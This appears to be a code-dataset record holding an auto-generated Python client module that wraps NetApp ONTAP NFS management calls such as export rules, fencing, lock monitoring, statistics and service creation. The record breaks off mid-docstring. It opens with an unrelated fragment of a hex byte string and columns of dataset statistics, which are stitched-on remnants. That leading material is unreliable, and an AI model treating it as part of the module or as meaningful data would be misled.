99\xcc\x43\x96\xc0\x11\x4d\x61\x26\x59\x77\x25\x04\x98\xc7\x08\xa8\x83\x52\x62\xe4\xa1\xd7\xdd\x53\xdb\x2e\x11\xac\xfb\xbf\x51\x6c\x8a\x45\x12\xf7\x04\xf8\x2d\xbf\xfc\xd9\xca\xde\x2f\x25\x09', 2)
| 2,890.333333
| 8,611
| 0.750663
| 2,155
| 8,671
| 3.013921
| 0.12297
| 0.017552
| 0.018014
| 0.014781
| 0.006005
| 0.003695
| 0.003695
| 0
| 0
| 0
| 0
| 0.31232
| 0.001153
| 8,671
| 3
| 8,611
| 2,890.333333
| 0.437594
| 0
| 0
| 0
| 0
| 0.333333
| 0.988697
| 0.988697
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
4a37f6160c415d285d773357d335f0c2b1071e5e
| 56,621
|
py
|
Python
|
generated-libraries/python/netapp/nfs/__init__.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | 2
|
2017-03-28T15:31:26.000Z
|
2018-08-16T22:15:18.000Z
|
generated-libraries/python/netapp/nfs/__init__.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | null | null | null |
generated-libraries/python/netapp/nfs/__init__.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | null | null | null |
from netapp.connection import NaConnection
from nfsv3_client_stats_info import Nfsv3ClientStatsInfo # 22 properties
from security_rule_info import SecurityRuleInfo # 6 properties
from rpc_data_info import RpcDataInfo # 5 properties
from nfsv2_client_stats_info import Nfsv2ClientStatsInfo # 18 properties
from hostaddr import Hostaddr # 0 properties
from rpc_stats_info import RpcStatsInfo # 2 properties
from nfschownmode import Nfschownmode # 0 properties
from exports_rule_info_2 import ExportsRuleInfo2 # 3 properties
from sec_flavor_info import SecFlavorInfo # 1 properties
from nfs_stats_info import NfsStatsInfo # 5 properties
from nfs_info import NfsInfo # 46 properties
from pathname_info import PathnameInfo # 1 properties
from exports_rule_info import ExportsRuleInfo # 8 properties
from nfs_service_get_iter_key_td import NfsServiceGetIterKeyTd # 1 properties
from owner_info import OwnerInfo # 2 properties
from nfs_top_info import NfsTopInfo # 10 properties
from nfsv4_client_stats_info import Nfsv4ClientStatsInfo # 44 properties
from tcp_flowcontrol_stats_info import TcpFlowcontrolStatsInfo # 4 properties
from exports_hostname_info import ExportsHostnameInfo # 3 properties
class NfsConnection(NaConnection):
def nfs_exportfs_storage_path(self, pathname):
"""
For the given path, determine the actual storage path.
Returns an error if the path does not exist.
:param pathname: Virtual pathname which has a rule associated with an actual
pathname.
"""
return self.request( "nfs-exportfs-storage-path", {
'pathname': [ pathname, 'pathname', [ basestring, 'None' ], False ],
}, {
'actual-pathname': [ basestring, False ],
} )
def nfs_stats_top_clients_list_iter_start(self, maxclients=None):
"""
Starts an iteration through the top NFS clients, ordered
by total NFS operations.
:param maxclients: Specifies the maximum number of top clients to retrieve
(the default is 20)
Range : [1..2^32-1].
"""
return self.request( "nfs-stats-top-clients-list-iter-start", {
'maxclients': [ maxclients, 'maxclients', [ int, 'None' ], False ],
}, {
'records': [ int, False ],
'tag': [ basestring, False ],
} )
def nfs_exportfs_fence_enable(self, fenced_hosts, fenced_paths=None, all_pathnames=None, persistent=None):
"""
Enables fencing to the given exports for the
given entry. This means that the entry will not have
write permission to the exports. The rule changes take effect
immediately. Set the persistent option to true to save the
rule in the /etc/exports file and keep the option persistent
upon loading or reboot.
:param fenced_hosts: An array of hostnames which are to be fenced off.
:param fenced_paths: An array of paths which are to be fenced off.
:param all_pathnames: Default value is false. Set to true to fence all rules.
'fenced-paths' option must be left empty if this option is true.
:param persistent: Default value is false. If true, modifies the etc/exports file
to append the rule for a permanent change. (The new rule still
takes effect immediately.) If false, only change the
exports in memory.
"""
return self.request( "nfs-exportfs-fence-enable", {
'fenced_paths': [ fenced_paths, 'fenced-paths', [ PathnameInfo, 'None' ], True ],
'all_pathnames': [ all_pathnames, 'all-pathnames', [ bool, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'fenced_hosts': [ fenced_hosts, 'fenced-hosts', [ ExportsHostnameInfo, 'None' ], True ],
}, {
} )
def nfs_monitor_add(self, hosts):
"""
starts monitoring the specified hosts for NFS lock recovery
purposes. The specified hosts are added to the list of
of clients that will be notified of lock recovery in the
event of an NFS server crash/reboot. For more information,
see the sm_mon(1a) manual page.
:param hosts: an array of hosts that are to be monitored.
"""
return self.request( "nfs-monitor-add", {
'hosts': [ hosts, 'hosts', [ basestring, 'hostaddr' ], True ],
}, {
} )
def nfs_stats_get_client_stats(self, host):
"""
Collects NFS statistics for a specified client
:param host: Hostname or IP address of client
"""
return self.request( "nfs-stats-get-client-stats", {
'host': [ host, 'host', [ basestring, 'None' ], False ],
}, {
'nfs-stats': [ NfsStatsInfo, False ],
'client-info': [ basestring, False ],
'rpc-stats': [ RpcStatsInfo, False ],
'tcp-flowcontrol-stats': [ TcpFlowcontrolStatsInfo, False ],
} )
def nfs_exportfs_check_permission(self, host, pathname, permission):
"""
Returns true if the host IP has mount permissions for a
specified path.
:param host: IP address of the host to check in dotted decimal format:
AAA.BBB.CCC.DDD
:param pathname: Returns the permissions for this path.
:param permission: Possible values: "read-only", "read-write", and "root".
"""
return self.request( "nfs-exportfs-check-permission", {
'host': [ host, 'host', [ basestring, 'None' ], False ],
'pathname': [ pathname, 'pathname', [ basestring, 'None' ], False ],
'permission': [ permission, 'permission', [ basestring, 'None' ], False ],
}, {
'is-permissible': [ bool, False ],
} )
def nfs_status(self):
"""
Returns the status of the NFS server.
"""
return self.request( "nfs-status", {
}, {
'is-drained': [ bool, False ],
'is-enabled': [ bool, False ],
} )
def nfs_exportfs_modify_rule(self, persistent, rule):
"""
Functionally similar to append with the following caveats.
Returns an error if the rule does not exist.
Only works for one rule at a time.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true, modifies
the etc/exports file to append the rule for a permanent change.
(The new rule still takes effect immediately.)
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param rule: The rule to modify. Returns an error if a previous rule with
the same pathname is not already loaded into memory.
"""
return self.request( "nfs-exportfs-modify-rule", {
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'rule': [ rule, 'rule', [ ExportsRuleInfo, 'None' ], False ],
}, {
} )
def nfs_stats_top_clients_list_iter_next(self, tag, maximum):
"""
Continues the nfs-stats-top-clients-list-iter-start iteration
through the top NFS clients, ordered by total NFS operations.
:param tag: Tag from a previous nfs-stats-top-iter-start
:param maximum: The maximum number of entries to retrieve.
Range : [0..2^32-1].
"""
return self.request( "nfs-stats-top-clients-list-iter-next", {
'tag': tag,
'maximum': [ maximum, 'maximum', [ int, 'None' ], False ],
}, {
'records': [ int, False ],
'nfs-top': [ NfsTopInfo, True ],
} )
def nfs_service_get(self, desired_attributes=None):
"""
Get the NFS server configuration.
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nfs-service-get", {
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NfsInfo, 'None' ], False ],
}, {
'attributes': [ NfsInfo, False ],
} )
def nfs_monitor_reclaim(self, hosts=None):
"""
reclaims the NFS locks for the specified client hosts. If
no hosts are specified, then all the clients locks are
removed and are notified about lock recovery, as if an
NFS server crash/reboot had happened. If any hosts are
specified, then only those client hosts locks are reclaimed
For more information, see the sm_mon(1a) manual page.
:param hosts: hosts whose locks have to be reclaimed. If no hosts
are specified, then all the clients locks are reclaimed.
"""
return self.request( "nfs-monitor-reclaim", {
'hosts': [ hosts, 'hosts', [ basestring, 'hostaddr' ], True ],
}, {
} )
def nfs_exportfs_fence_disable(self, fenced_hosts, fenced_paths=None, remove_locks=None, all_pathnames=None, persistent=None):
"""
Disables fencing to the given exports for the
given entry. This means that the entry will have
write permission to the exports. The rule changes take effect
immediately. Set the persistent option to true to save the rule
in the /etc/exports file and keep the option persistent upon
loading or reboot.
:param fenced_hosts: An array of hostnames which are to be fenced off.
:param fenced_paths: An array of paths which are to be fenced off.
:param remove_locks: Default value is false. Set to true to reclaim locks of the
specified fenced-hosts.
:param all_pathnames: Default value is false. Set to true to unfence all rules.
'fenced-paths' option must be left empty if this option is true.
:param persistent: Default value is false. If true, modifies the etc/exports file
to append the rule for a permanent change. (The new rule still
takes effect immediately.) If false, only change the
exports in memory.
"""
return self.request( "nfs-exportfs-fence-disable", {
'fenced_paths': [ fenced_paths, 'fenced-paths', [ PathnameInfo, 'None' ], True ],
'remove_locks': [ remove_locks, 'remove-locks', [ bool, 'None' ], False ],
'all_pathnames': [ all_pathnames, 'all-pathnames', [ bool, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'fenced_hosts': [ fenced_hosts, 'fenced-hosts', [ ExportsHostnameInfo, 'None' ], True ],
}, {
} )
def nfs_exportfs_modify_rule_2(self, persistent, rule):
"""
Functionally similar to append-2 with the following caveats.
Returns an error if the rule does not exist.
Only works for one rule at a time.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true, modifies
the etc/exports file to append the rule for a permanent change.
(The new rule still takes effect immediately.)
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param rule: The rule to modify. Returns an error if a previous rule with
the same pathname is not already loaded into memory.
"""
return self.request( "nfs-exportfs-modify-rule-2", {
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'rule': [ rule, 'rule', [ ExportsRuleInfo2, 'None' ], False ],
}, {
} )
def nfs_stats_zero_stats(self):
"""
Set all NFS statistcs to zero
"""
return self.request( "nfs-stats-zero-stats", {
}, {
} )
def nfs_exportfs_list_rules(self, pathname=None, persistent=None):
"""
Returns the rules associated with exports. If a pathname
is specified, the rules associated with the export matching
that pathname, are returned; otherwise, rules for all exports
are returned.
:param pathname: The pathname, for whose matching export, the client wants
a listing of the associated rules. If this parameter is
provided, the persistent parameter is ignored.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true,
the export entries that are present in the /etc/exports file
are returned; otherwise, those loaded in memory are returned.
This parameter is ignored, if the pathname parameter is
provided.
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an empty list
will be returned.
"""
return self.request( "nfs-exportfs-list-rules", {
'pathname': [ pathname, 'pathname', [ basestring, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
}, {
'rules': [ ExportsRuleInfo, True ],
} )
def nfs_exportfs_append_rules_2(self, rules, persistent=None, verbose=None):
"""
Enables pathnames for mounting according to the rules
specified. New rules for the pathnames take effect immediately,
ignoring previous rules for specified pathnames.
In the Data ONTAP 7-Mode, set the persistent option to true to
save the rule in the etc/exports file and keep the option
persistent upon loading or reboot whereas it must be true in
Data ONTAP Cluster-Mode as the export entries are always
persistent.
The new security-rule-info structure contains finer grained
information about security rules than exports-rule-info.
:param rules: List of rules to add to the exports table.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true, modifies
the etc/exports file to append the rule for a permanent change.
(The new rule still takes effect immediately.)
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param verbose: If true, returns a list of directories which were appended.
Errors during the append are recorded in the 'results' field
error and 'loaded-pathnames' will contain which pathnames
were successfully appended. Default value is false.
"""
return self.request( "nfs-exportfs-append-rules-2", {
'rules': [ rules, 'rules', [ ExportsRuleInfo2, 'None' ], True ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'verbose': [ verbose, 'verbose', [ bool, 'None' ], False ],
}, {
'exported-pathnames': [ PathnameInfo, True ],
'loaded-pathnames': [ PathnameInfo, True ],
} )
def nfs_monitor_list(self):
"""
Lists the hosts that are currently being monitored by the
NFS status monitor.
"""
return self.request( "nfs-monitor-list", {
}, {
'hosts': [ basestring, True ],
} )
def nfs_monitor_remove(self, hosts):
"""
Starts unmonitoring the specified hosts for NFS lock
recovery purposes. The specified hosts are removed
from the list of clients that will be notified of lock
recovery in the event of an NFS server crash/reboot. For
more information, see the sm_mon(1a) manual page.
:param hosts: an array of hosts that are to be unmonitored.
"""
return self.request( "nfs-monitor-remove", {
'hosts': [ hosts, 'hosts', [ basestring, 'hostaddr' ], True ],
}, {
} )
def nfs_exportfs_load_exports(self, persistent_only=None):
"""
Loads the etc/exports file into memory. Replaces exports
rules already residing in memory.
:param persistent_only: Default value is false. If true, atomically reloads each
rule from the exports file and unloads all other rules.
"""
return self.request( "nfs-exportfs-load-exports", {
'persistent_only': [ persistent_only, 'persistent-only', [ bool, 'None' ], False ],
}, {
} )
def nfs_disable(self):
"""
In Data ONTAP 7-Mode, this API will disable NFS server
access (effectively same as the CLI command "nfs off")
In Data ONTAP Cluster-Mode, this will stop the Vserver's
NFS service. If the NFS service was not explicitly created,
this API does nothing.
"""
return self.request( "nfs-disable", {
}, {
} )
def nfs_get_supported_sec_flavors(self):
"""
Returns a list of currently supported security flavors.
Hosts with permmisions and connecting via the proper security
flavor have access to directories on the filer. Default
security flavor for all exports is "sys".
"""
return self.request( "nfs-get-supported-sec-flavors", {
}, {
'sec-flavor': [ SecFlavorInfo, True ],
} )
def nfs_exportfs_append_rules(self, rules, persistent=None, verbose=None):
"""
Enables pathnames for mounting according to the rules
specified. New rules for the pathnames take effect immediately,
ignoring previous rules for specified pathnames.
In the Data ONTAP 7-Mode, set the persistent option to true to
save the rule in the etc/exports file and keep the option
persistent upon loading or reboot whereas it must be true in
Data ONTAP Cluster-Mode as the export entries are always
persistent.
:param rules: List of rules to add to the exports table.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true, modifies
the etc/exports file to append the rule for a permanent change.
(The new rule still takes effect immediately.)
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param verbose: If true, returns a list of directories which were appended.
Errors during the append are recorded in the 'results' field
error and 'loaded-pathnames' will contain which pathnames
were successfully appended. Default value is false.
"""
return self.request( "nfs-exportfs-append-rules", {
'rules': [ rules, 'rules', [ ExportsRuleInfo, 'None' ], True ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'verbose': [ verbose, 'verbose', [ bool, 'None' ], False ],
}, {
'exported-pathnames': [ PathnameInfo, True ],
'loaded-pathnames': [ PathnameInfo, True ],
} )
def nfs_service_get_create_defaults(self, attributes=None):
"""
Obtain the default values for NFS server configuration.
:param attributes: Optionally specify the value for attributes if available.
The default values for some attributes may depend on the values
specified for some other attribute.
"""
return self.request( "nfs-service-get-create-defaults", {
'attributes': [ attributes, 'attributes', [ NfsInfo, 'None' ], False ],
}, {
'defaults': [ NfsInfo, False ],
} )
def nfs_service_create(self, is_nfsv3_connection_drop_enabled=None, is_nfsv3_enabled=None, default_windows_user=None, is_nfsv41_acl_preserve_enabled=None, is_nfsv40_referrals_enabled=None, is_nfsv41_pnfs_enabled=None, is_nfsv40_migration_enabled=None, chown_mode=None, is_nfsv41_referrals_enabled=None, nfsv41_implementation_id_domain=None, nfsv41_implementation_id_name=None, is_nfsv4_numeric_ids_enabled=None, is_nfsv40_acl_enabled=None, is_nfs_access_enabled=None, rpcsec_ctx_idle=None, is_nfsv2_enabled=None, nfsv4_acl_max_aces=None, is_nfsv4_fsid_change_enabled=None, is_nfsv40_req_open_confirm_enabled=None, nfsv4_id_domain=None, is_nfsv40_read_delegation_enabled=None, is_nfs_rootonly_enabled=None, is_nfsv41_pnfs_striped_volumes_enabled=None, nfsv41_implementation_id_time=None, is_nfsv41_acl_enabled=None, is_nfsv40_write_delegation_enabled=None, ntfs_unix_security_ops=None, is_mount_rootonly_enabled=None, nfsv4x_session_num_slots=None, enable_ejukebox=None, nfsv4x_session_slot_reply_cache_size=None, rpcsec_ctx_high=None, is_nfsv41_read_delegation_enabled=None, is_vstorage_enabled=None, is_nfsv3_fsid_change_enabled=None, nfsv4_grace_seconds=None, nfsv4_lease_seconds=None, return_record=None, is_nfsv41_write_delegation_enabled=None, is_nfsv41_migration_enabled=None, is_validate_qtree_export_enabled=None, is_nfsv41_enabled=None, is_nfsv40_enabled=None, default_windows_group=None, is_nfsv41_state_protection_enabled=None):
"""
Create a new NFS configuration.
:param is_nfsv3_connection_drop_enabled: If 'true', then connection is dropped when an NFSv3 request is
dropped. Default value is 'true'.
:param is_nfsv3_enabled: If 'true', then NFS version 3 is enabled. Default value is
'true'.
:param default_windows_user: The default windows user for CIFS access.
:param is_nfsv41_acl_preserve_enabled: If 'true', the NFSv4 server will preserve and modify ACL when
chmod <mode> is done. Default value is 'true'.
:param is_nfsv40_referrals_enabled: If 'true', then NFSv4.0 Referrals feature is enabled. Default
value is 'false'.
:param is_nfsv41_pnfs_enabled: If 'true', then Parallel NFS support for NFS version 4.1 is
enabled. Default value is 'true'.
:param is_nfsv40_migration_enabled: If 'true', then NFSv4.0 Migration feature is enabled. Default
value is 'false'.
:param chown_mode: Vserver Change Ownership Mode. Possible values are 'ignore',
'fail', 'use_export_policy'. If 'use_export_policy' is set,
export policy option is used. Default value is
'use_export_policy'.
Possible values:
<ul>
<li> "restricted" ,
<li> "unrestricted" ,
<li> "use_export_policy"
</ul>
:param is_nfsv41_referrals_enabled: If 'true', then NFSv4.1 Referrals feature is enabled. Default
value is 'false'.
:param nfsv41_implementation_id_domain: NFSv4.1 Implementation id domain. Default value is
'defaultv41impliddomain.com'.
:param nfsv41_implementation_id_name: NFSv4.1 Implementation id name. Default value is
'defaultv41implidname'.
:param is_nfsv4_numeric_ids_enabled: If 'true', then NFSv4 support for Numeric Owner IDs is enabled.
Default value is 'true'.
:param is_nfsv40_acl_enabled: If 'true', then NFSv4.0 ACL feature is enabled. Default value is
'false'.
:param is_nfs_access_enabled: If 'true',then NFS server access is enabled. Default value is
'true'.
:param rpcsec_ctx_idle: Time in seconds before an idle entry in RPCSEC_GSS context cache
is deleted. Default value is 0.
:param is_nfsv2_enabled: Starting Data ONTAP 8.2, NFS v2 is no longer supported. Default
value is 'false'.
:param nfsv4_acl_max_aces: Maximum Number of ACEs allowed in an ACL. Range is 192 to 1024.
Default value is 400.
:param is_nfsv4_fsid_change_enabled: If 'true', then clients see change in FSID as NFSv4 clients
traverse filesystems. Default value is 'true'.
:param is_nfsv40_req_open_confirm_enabled: If 'true', then the server will require an OPEN_CONFIRM operation
for all NFSv4.0 clients. Default value is 'false'.
:param nfsv4_id_domain: NFSv4 ID mapping domain. Default value is
'defaultv4iddomain.com'.
:param is_nfsv40_read_delegation_enabled: If 'true', NFSv4.0 read delegation feature is enabled. Default
value is 'false'.
:param is_nfs_rootonly_enabled: If 'true', then the vserver allows NFS protocol calls only from
privileged ports (port numbers less than 1024). Default value is
'false'.
:param is_nfsv41_pnfs_striped_volumes_enabled: If 'true', Striped volume support for Parallel NFS is enabled .
Default value is 'false'.
:param nfsv41_implementation_id_time: NFSv4.1 Implementation id time.The number of seconds since
January 1, 1970.
:param is_nfsv41_acl_enabled: If 'true', then NFSv4.1 ACL feature is enabled. Default value is
'false'.
:param is_nfsv40_write_delegation_enabled: If 'true', NFSv4.0 write delegation feature is enabled. Default
value is 'false'.
:param ntfs_unix_security_ops: Ignore/Fail unix security operations on NTFS volumes. Possible
values are 'ignore', 'fail','use_export_policy'. If
'use_export_policy' is set, export policy option is used.
Default value is 'use_export_policy'.
:param is_mount_rootonly_enabled: If 'true', then the vserver allows MOUNT protocol calls only from
privileged ports (port numbers less than 1024). Default value is
'true'.
:param nfsv4x_session_num_slots: Number of Slots in the NFSv4.x Session Slot Tables. Default value
is 180.
:param enable_ejukebox: If 'true', then the NFS server will send EJUKEBOX error on server
delays.
:param nfsv4x_session_slot_reply_cache_size: Size of the Reply that will be Cached in Each NFSv4.x Session
Slot (in bytes). Default value is 640.
:param rpcsec_ctx_high: High water mark for the RPCSEC_GSS Context Cache. Default value
is 0.
:param is_nfsv41_read_delegation_enabled: If 'true', NFSv4.1 read delegation feature is enabled. Default
value is 'false'.
:param is_vstorage_enabled: If 'true', then enables the usage of vStorage protocol for server
side copies, which is mostly used in hypervisors. Default value
is 'false'.
:param is_nfsv3_fsid_change_enabled: If 'true', then NFSv3 clients see change in FSID as they traverse
filesystems. Default value is 'true'.
:param nfsv4_grace_seconds: NFSv4 Grace timeout value in seconds. Default value is 45
seconds.
:param nfsv4_lease_seconds: NFSv4 Lease timeout value in seconds. Default value is 30
seconds.
:param return_record: If set to true, returns the NFS Server on successful creation.
Default: false
:param is_nfsv41_write_delegation_enabled: If 'true', NFSv4.1 write delegation feature is enabled. Default
value is 'false'.
:param is_nfsv41_migration_enabled: If 'true', then NFSv4.1 Migration feature is enabled. Default
value is 'false'.
:param is_validate_qtree_export_enabled: If 'true', then the Vserver performs additional validation for
qtree. Default value is 'true'.
:param is_nfsv41_enabled: If 'true', then NFS version 4.1 is enabled. Default value is
'false'.
:param is_nfsv40_enabled: If 'true', then NFS version 4.0 is enabled. Default value is
'false'.
:param default_windows_group: The default windows group for CIFS access.
:param is_nfsv41_state_protection_enabled: If 'true', then NFSv4.1 State Protection is enabled. Default
value is 'true'.
"""
return self.request( "nfs-service-create", {
'is_nfsv3_connection_drop_enabled': [ is_nfsv3_connection_drop_enabled, 'is-nfsv3-connection-drop-enabled', [ bool, 'None' ], False ],
'is_nfsv3_enabled': [ is_nfsv3_enabled, 'is-nfsv3-enabled', [ bool, 'None' ], False ],
'default_windows_user': [ default_windows_user, 'default-windows-user', [ basestring, 'None' ], False ],
'is_nfsv41_acl_preserve_enabled': [ is_nfsv41_acl_preserve_enabled, 'is-nfsv41-acl-preserve-enabled', [ bool, 'None' ], False ],
'is_nfsv40_referrals_enabled': [ is_nfsv40_referrals_enabled, 'is-nfsv40-referrals-enabled', [ bool, 'None' ], False ],
'is_nfsv41_pnfs_enabled': [ is_nfsv41_pnfs_enabled, 'is-nfsv41-pnfs-enabled', [ bool, 'None' ], False ],
'is_nfsv40_migration_enabled': [ is_nfsv40_migration_enabled, 'is-nfsv40-migration-enabled', [ bool, 'None' ], False ],
'chown_mode': [ chown_mode, 'chown-mode', [ basestring, 'nfschownmode' ], False ],
'is_nfsv41_referrals_enabled': [ is_nfsv41_referrals_enabled, 'is-nfsv41-referrals-enabled', [ bool, 'None' ], False ],
'nfsv41_implementation_id_domain': [ nfsv41_implementation_id_domain, 'nfsv41-implementation-id-domain', [ basestring, 'None' ], False ],
'nfsv41_implementation_id_name': [ nfsv41_implementation_id_name, 'nfsv41-implementation-id-name', [ basestring, 'None' ], False ],
'is_nfsv4_numeric_ids_enabled': [ is_nfsv4_numeric_ids_enabled, 'is-nfsv4-numeric-ids-enabled', [ bool, 'None' ], False ],
'is_nfsv40_acl_enabled': [ is_nfsv40_acl_enabled, 'is-nfsv40-acl-enabled', [ bool, 'None' ], False ],
'is_nfs_access_enabled': [ is_nfs_access_enabled, 'is-nfs-access-enabled', [ bool, 'None' ], False ],
'rpcsec_ctx_idle': [ rpcsec_ctx_idle, 'rpcsec-ctx-idle', [ int, 'None' ], False ],
'is_nfsv2_enabled': [ is_nfsv2_enabled, 'is-nfsv2-enabled', [ bool, 'None' ], False ],
'nfsv4_acl_max_aces': [ nfsv4_acl_max_aces, 'nfsv4-acl-max-aces', [ int, 'None' ], False ],
'is_nfsv4_fsid_change_enabled': [ is_nfsv4_fsid_change_enabled, 'is-nfsv4-fsid-change-enabled', [ bool, 'None' ], False ],
'is_nfsv40_req_open_confirm_enabled': [ is_nfsv40_req_open_confirm_enabled, 'is-nfsv40-req-open-confirm-enabled', [ bool, 'None' ], False ],
'nfsv4_id_domain': [ nfsv4_id_domain, 'nfsv4-id-domain', [ basestring, 'None' ], False ],
'is_nfsv40_read_delegation_enabled': [ is_nfsv40_read_delegation_enabled, 'is-nfsv40-read-delegation-enabled', [ bool, 'None' ], False ],
'is_nfs_rootonly_enabled': [ is_nfs_rootonly_enabled, 'is-nfs-rootonly-enabled', [ bool, 'None' ], False ],
'is_nfsv41_pnfs_striped_volumes_enabled': [ is_nfsv41_pnfs_striped_volumes_enabled, 'is-nfsv41-pnfs-striped-volumes-enabled', [ bool, 'None' ], False ],
'nfsv41_implementation_id_time': [ nfsv41_implementation_id_time, 'nfsv41-implementation-id-time', [ int, 'date' ], False ],
'is_nfsv41_acl_enabled': [ is_nfsv41_acl_enabled, 'is-nfsv41-acl-enabled', [ bool, 'None' ], False ],
'is_nfsv40_write_delegation_enabled': [ is_nfsv40_write_delegation_enabled, 'is-nfsv40-write-delegation-enabled', [ bool, 'None' ], False ],
'ntfs_unix_security_ops': [ ntfs_unix_security_ops, 'ntfs-unix-security-ops', [ basestring, 'None' ], False ],
'is_mount_rootonly_enabled': [ is_mount_rootonly_enabled, 'is-mount-rootonly-enabled', [ bool, 'None' ], False ],
'nfsv4x_session_num_slots': [ nfsv4x_session_num_slots, 'nfsv4x-session-num-slots', [ int, 'None' ], False ],
'enable_ejukebox': [ enable_ejukebox, 'enable-ejukebox', [ bool, 'None' ], False ],
'nfsv4x_session_slot_reply_cache_size': [ nfsv4x_session_slot_reply_cache_size, 'nfsv4x-session-slot-reply-cache-size', [ int, 'None' ], False ],
'rpcsec_ctx_high': [ rpcsec_ctx_high, 'rpcsec-ctx-high', [ int, 'None' ], False ],
'is_nfsv41_read_delegation_enabled': [ is_nfsv41_read_delegation_enabled, 'is-nfsv41-read-delegation-enabled', [ bool, 'None' ], False ],
'is_vstorage_enabled': [ is_vstorage_enabled, 'is-vstorage-enabled', [ bool, 'None' ], False ],
'is_nfsv3_fsid_change_enabled': [ is_nfsv3_fsid_change_enabled, 'is-nfsv3-fsid-change-enabled', [ bool, 'None' ], False ],
'nfsv4_grace_seconds': [ nfsv4_grace_seconds, 'nfsv4-grace-seconds', [ int, 'None' ], False ],
'nfsv4_lease_seconds': [ nfsv4_lease_seconds, 'nfsv4-lease-seconds', [ int, 'None' ], False ],
'return_record': [ return_record, 'return-record', [ bool, 'None' ], False ],
'is_nfsv41_write_delegation_enabled': [ is_nfsv41_write_delegation_enabled, 'is-nfsv41-write-delegation-enabled', [ bool, 'None' ], False ],
'is_nfsv41_migration_enabled': [ is_nfsv41_migration_enabled, 'is-nfsv41-migration-enabled', [ bool, 'None' ], False ],
'is_validate_qtree_export_enabled': [ is_validate_qtree_export_enabled, 'is-validate-qtree-export-enabled', [ bool, 'None' ], False ],
'is_nfsv41_enabled': [ is_nfsv41_enabled, 'is-nfsv41-enabled', [ bool, 'None' ], False ],
'is_nfsv40_enabled': [ is_nfsv40_enabled, 'is-nfsv40-enabled', [ bool, 'None' ], False ],
'default_windows_group': [ default_windows_group, 'default-windows-group', [ basestring, 'None' ], False ],
'is_nfsv41_state_protection_enabled': [ is_nfsv41_state_protection_enabled, 'is-nfsv41-state-protection-enabled', [ bool, 'None' ], False ],
}, {
'result': [ NfsInfo, False ],
} )
def nfs_service_destroy(self):
"""
Delete an NFS configuration.
"""
return self.request( "nfs-service-destroy", {
}, {
} )
def nfs_exportfs_flush_cache(self, pathname=None):
"""
For the given path, renew or flush the access cache.
:param pathname: Pathname to flush. If this input is not provided, all of the
paths in the exports table are flushed.
"""
return self.request( "nfs-exportfs-flush-cache", {
'pathname': [ pathname, 'pathname', [ basestring, 'None' ], False ],
}, {
} )
def nfs_exportfs_delete_rules(self, all_pathnames=None, persistent=None, pathnames=None, verbose=None):
"""
Removes the rules for a set of pathnames. This returns an error
if any of the pathnames don't have a rule.
In the Data ONTAP 7-Mode, set the persistent option to modify
the etc/exports file and keep this change persistent upon
reboots whereas it must be true in Data ONTAP Cluster-Mode
as the export entries are always persistent.
:param all_pathnames: Default value is false. Set to true to delete all rules.
'pathnames' option must be left empty if this option is true.
:param persistent: In Data ONTAP 7-Mode, default value is false. Modify
the etc/exports file to delete the rules permanently.
CAUTION: If 'all-pathnames' and 'persistent' are both true,
all exports are removed permanently.
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param pathnames: In the Data ONTAP 7-Mode, these must be the pathnames
to be deleted from the exports table.
In Data ONTAP Cluster-Mode, the junction paths of the
volumes to be unexported must be provided.
:param verbose: Return a verbose output of what occurred. If there is
an error after deleting only a few rules, 'deleted-pathnames'
will return which rules were deleted. Default value is false.
"""
return self.request( "nfs-exportfs-delete-rules", {
'all_pathnames': [ all_pathnames, 'all-pathnames', [ bool, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'pathnames': [ pathnames, 'pathnames', [ PathnameInfo, 'None' ], True ],
'verbose': [ verbose, 'verbose', [ bool, 'None' ], False ],
}, {
'unexported-pathnames': [ PathnameInfo, True ],
'deleted-pathnames': [ PathnameInfo, True ],
} )
def nfs_service_get_iter(self, max_records=None, query=None, tag=None, desired_attributes=None):
"""
Iterate over the list of NFS servers.
:param max_records: The maximum number of records to return in this call.
Default: 20
:param query: A query that specifies which objects to return.
A query could be specified on any number of attributes in the NFS
Server object.
All NFS Server objects matching this query up to 'max-records'
will be returned.
:param tag: Specify the tag from the last call.
It is usually not specified for the first call. For subsequent
calls, copy values from the 'next-tag' obtained from the previous
call.
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
